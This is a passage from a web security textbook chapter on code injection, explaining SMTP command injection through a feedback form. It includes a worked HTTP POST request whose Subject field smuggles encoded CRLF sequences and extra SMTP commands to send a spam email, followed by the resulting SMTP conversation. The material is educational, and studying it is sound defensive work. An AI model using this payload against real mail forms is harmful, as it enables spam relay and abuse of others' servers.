Chapter 9  ■ Injecting Code

N OT E

After the SMTP client issues the 

DATA

command, it sends the contents

of the email message, comprising the message headers and body, and then

sends a single dot character on its own line. This tells the server that the

message is complete, and the client can then issue further SMTP commands, to

send further messages.

In this situation, you may be able to inject arbitrary SMTP commands into

any of the email fields that you control. For example, you can attempt to inject

into the Subject field as follows:

POST feedback.php HTTP/1.1

Host: wahh-app.com

Content-Length: 266

From=daf@wahh-mail.com&Subject=Site+feedback%0d%0afoo%0d%0a%2e%0d

%0aMAIL+FROM:+mail@wahh-viagra.com%0d%0aRCPT+TO:+john@wahh-mail

.com%0d%0aDATA%0d%0aFrom:+mail@wahh-viagra.com%0d%0aTo:+john@wahh-mail

.com%0d%0aSubject:+Cheap+V1AGR4%0d%0aBlah%0d%0a%2e%0d%0a&Message=foo

If the application is vulnerable, then this will result in the following SMTP

conversation, which generates two different email messages, with the second

being entirely within your control:

MAIL FROM: daf@wahh-mail.com

RCPT TO: feedback@wahh-app.com

DATA 

From: daf@wahh-mail.com

To: feedback@wahh-app.com

Subject: Site+feedback

foo

.

MAIL FROM: mail@wahh-viagra.com

RCPT TO: john@wahh-mail.com

DATA

From: mail@wahh-viagra.com

To: john@wahh-mail.com

Subject: Cheap V1AGR4

Blah

.

foo

.

Download 5,76 Mb.

Do'stlaringiz bilan baham: